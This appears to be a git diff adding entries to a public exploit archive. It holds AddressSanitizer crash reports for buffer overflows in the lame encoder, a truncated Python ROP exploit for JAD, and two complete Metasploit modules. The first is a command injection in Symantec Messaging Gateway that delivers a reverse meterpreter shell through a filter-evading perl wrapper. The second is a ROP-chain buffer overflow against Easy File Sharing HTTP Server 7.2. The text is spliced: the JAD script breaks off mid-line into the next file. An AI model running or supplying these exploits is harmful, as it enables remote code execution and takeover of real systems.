/var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877 + #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785 + #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16 + #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17 + #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531 + #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15 + #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15 + #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438 + #16 0x7f598be51680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289 + #17 0x41c998 in _init (/usr/bin/lame+0x41c998) + +0x7f598d317f20 is located 0 bytes to the right of global variable 'alloc_2' defined in '/var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/l2tables.h:118:24' (0x7f598d317de0) of size 320 +SUMMARY: AddressSanitizer: global-buffer-overflow /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36 in II_step_one +Shadow bytes around the buggy address: + 0x0febb1a5af90: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5afa0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5afb0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x0febb1a5afc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5afd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0febb1a5afe0: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x0febb1a5aff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5b000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5b010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0febb1a5b020: 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 + 0x0febb1a5b030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27479==ABORTING +Affected version: +3.99.5 + +Fixed version: +N/A + +Commit fix: +N/A + +Credit: +This bug was discovered by Agostino Sarubbo of Gentoo. + +CVE: +N/A + +Reproducer: +https://github.com/asarubbo/poc/blob/master/00290-lame-globaloverflow-II_step_one + +Timeline: +2017-06-01: bug discovered +2017-06-17: blog post about the issue + +Note: +This bug was found with American Fuzzy Lop. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42258.zip diff --git a/platforms/linux/dos/42259.txt b/platforms/linux/dos/42259.txt new file mode 100755 index 000000000..5dacb304f --- /dev/null +++ b/platforms/linux/dos/42259.txt @@ -0,0 +1,91 @@ +Description: +lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL. + +Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record. + +The complete ASan output of the issue: + +# lame -f -V 9 $FILE out.wav +==30801==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe82a515a0 at pc 0x7f56d24c9df7 bp 0x7ffe82a4ffb0 sp 0x7ffe82a4ffa8 +WRITE of size 4 at 0x7ffe82a515a0 thread T0 + #0 0x7f56d24c9df6 in III_dequantize_sample /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c + #1 0x7f56d24a664f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1738:17 + #2 0x7f56d24733ca in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:615:13 + #3 0x7f56d2470c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12 + #4 0x7f56d2431092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11 + #5 0x7f56d243694a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16 + #6 0x7f56d243694a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379 + #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11 + #8 0x51e984 in read_samples_mp3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877 + #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785 + #10 0x51e4fa in get_audio /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:688:16 + #11 0x50f776 in lame_encoder_loop /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:456:17 + #12 0x50f776 in lame_encoder /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:531 + #13 0x50c43f in lame_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/lame_main.c:707:15 + #14 0x510793 in c_main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:470:15 + #15 0x510793 in main /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/main.c:438 + #16 0x7f56d1029680 in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289 + #17 0x41c998 in _init (/usr/bin/lame+0x41c998) + +Address 0x7ffe82a515a0 is located in stack of thread T0 at offset 5024 in frame + #0 0x7f56d24a548f in decode_layer3_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer3.c:1659 + + This frame has 4 object(s): + [32, 344) 'scalefacs' + [416, 5024) 'hybridIn' 0x1000505422b0: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x1000505422c0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x1000505422d0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000505422e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000505422f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100050542300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30801==ABORTING +Affected version: +3.99.5 + +Fixed version: +N/A + +Commit fix: +N/A + +Credit: +This bug was discovered by Agostino Sarubbo of Gentoo. + +CVE: +N/A + +Reproducer: +https://github.com/asarubbo/poc/blob/master/00294-lame-stackoverflow-III_dequantize_sample + +Timeline: +2017-06-01: bug discovered +2017-06-17: blog post about the issue + +Note: +This bug was found with American Fuzzy Lop. + +Permalink: +https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_dequantize_sample-layer3-c + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42259.zip diff --git a/platforms/linux/local/42255.py b/platforms/linux/local/42255.py new file mode 100755 index 000000000..cbefa26a3 --- /dev/null +++ b/platforms/linux/local/42255.py @@ -0,0 +1,103 @@ +#!/usr/bin/python +# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com +# Developed using Exploit Pack - http://exploitpack.com - +# Tested on: GNU/Linux - Kali 2017.1 Release +# +# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: http://www.varaneckas.com/jad/ +# +# CANARY : disabled +# FORTIFY : disabled +# NX : ENABLED +# PIE : disabled +# RELRO : disabled +# +import os, subprocess +from struct import pack + +ropchain = "A"*8150 # junk +ropchain += pack(' "Symantec Messaging Gateway Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a + terminal command under the context of the web server user which is root. + + backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing + operating system command. One of the user input is being passed to the service without proper validation. That cause an command + injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal + command. Thus, you need to configure your own SSH service and set the required parameter during module usage. + + This module was tested against Symantec Messaging Gateway 10.6.2-7. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/'], + ['CVE', '2017-6326'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 443, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => true, + 'DisclosureDate' => "Apr 26 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('SSH_ADDRESS', [true, 'The ip address of your SSH service']), + OptInt.new('SSH_PORT', [true, 'The port of your SSH service', 22]), + OptString.new('SSH_USERNAME', [true, 'The username of your SSH service']), + OptString.new('SSH_PASSWORD', [true, 'The password of your SSH service']), + OptString.new('TARGETURI', [true, 'The base path to Symantec Messaging Gateway', '/']) + ] + ) + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def ssh_address + datastore['SSH_ADDRESS'] + end + + def ssh_port + datastore['SSH_PORT'] + end + + def ssh_username + datastore['SSH_USERNAME'] + end + + def ssh_password + datastore['SSH_PASSWORD'] + end + + def auth + print_status("Performing authentication...") + + sid = '' + last_login = '' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'viewLogin.do') + }) + + if res && !res.get_cookies.empty? + last_login = res.get_hidden_inputs.first['lastlogin'] || '' + sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + else + fail_with(Failure::Unknown, "Didn't get cookie-set header from response.") + end + + cookie = '' + + # Performing authentication + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'login.do'), + 'headers' => { + 'Referer' => "https://#{peer}/brightmail/viewLogin.do", + 'Connection' => 'keep-alive' + }, + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}", + 'vars_post' => { + 'lastlogin' => last_login, + 'userLocale' => '', + 'lang' => 'en_US', + 'username' => username, + 'password' => password, + 'loginBtn' => 'Login' + } + }) + + if res &&res.body =~ /Logged in/ + cookie = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] + print_good("Awesome..! Authenticated with #{username}:#{password}") + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + + cookie + end + + def get_csrf_token(cookie) + + print_status('Capturing CSRF token') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'backupNow.do'), + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}", + }) + + csrf_token = nil + if res && res.code == 200 + match = res.body.match(/type="hidden" name="symantec.brightmail.key.TOKEN" value="(\w+)"\/>/) + if match + csrf_token = match[1] + print_good("CSRF token is : #{csrf_token}") + else + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + + csrf_token + end + + def exploit + + cookie = auth + csrf_token = get_csrf_token(cookie) + + # I want to get meterpreter instead of cmd shell but SPACE and some other characters are blacklisted. + # Note that, we always have one SPACE at the beginning of python payload. e.g: import base64,sys; + # Here is the thing, use perl payload with ${IFS} technique and deliver the real payload inside of it :) + # So we gonna execute a perl payload on server side which will execute our meterpreter python payload. + + cmd = "python -c \"#{payload.encoded}\"" + final_payload = cmd.to_s.unpack("H*").first + + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Ok. We are ready to go + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'brightmail', 'admin', 'backup', 'performBackupNow.do'), + 'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{cookie}", + 'vars_post' => { + 'pageReuseFor' => 'backup_now', + 'id' => '', + 'symantec.brightmail.key.TOKEN' => csrf_token, + 'backupData' => 'full', + 'customType' => 'configuration', + 'includeIncidentMessages' => 'true', + 'includeLogData' => 'true', + 'backupTo' => '2', + 'remoteBackupProtocol' => 'SCP', + 'remoteBackupAddress' => ssh_address, + 'remoteBackupPort' => ssh_port, + 'remoteBackupPath' => "tmp$(#{p})", + 'requiresRemoteAuthentication' => 'true', + 'remoteBackupUsername' => ssh_username, + 'remoteBackupPassword' => ssh_password, + } + }) + end + +end diff --git a/platforms/windows/dos/42253.html b/platforms/windows/dos/42253.html new file mode 100755 index 000000000..09f04e1dd --- /dev/null +++ b/platforms/windows/dos/42253.html @@ -0,0 +1,26 @@ + + + + + + + Y0U HAVE BEEN EXPL0ITED! + + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/42256.rb b/platforms/windows/remote/42256.rb new file mode 100755 index 000000000..4b50bbb18 --- /dev/null +++ b/platforms/windows/remote/42256.rb @@ -0,0 +1,159 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + #include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow', + 'Description' => %q{ + This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => + [ + 'bl4ck h4ck3r', #POC + 'Marco Rivoli ' #Metasploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '42186' ], + ], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80, + 'EXITFUNC' => 'thread', + 'ENCODER' => 'x86/alpha_mixed' + }, + 'DisclosureDate' => 'Jun 12 2017', + 'DefaultTarget' => 0)) + end + + def create_rop_chain + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + # 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0xFFFFFDFE, # -202 + 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] + 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ} + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0x1004de84, # &Writable location [ImageLoad.dll] + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] + 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] + 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] + 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] + 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] + 0x100218f9, # POP EBP # RETN [ImageLoad.dll] + 0x61c24169, # & push esp # ret [sqlite3.dll] + 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] + 0x1001bd98, # POP ECX # RETN [ImageLoad.dll] + 0x1004de84, # &Writable location [ImageLoad.dll] + 0x61c373a4, # POP EDI # RETN [sqlite3.dll] + 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] + 0x10015442, # POP EAX # RETN [ImageLoad.dll] + 0x90909090, # nop + 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] + ].flatten.pack('V*') + return rop_gadgets + end + + def exploit + sploit = rand_text_alpha_upper(2278) + rop_chain = create_rop_chain + sploit << rop_chain + sploit << "\x90" * 200 + sploit << payload.encoded + sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length) + sploit << [target.ret].pack('V') + + request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password" + connect + sock.put(request) + handler + disconnect + end +end \ No newline at end of file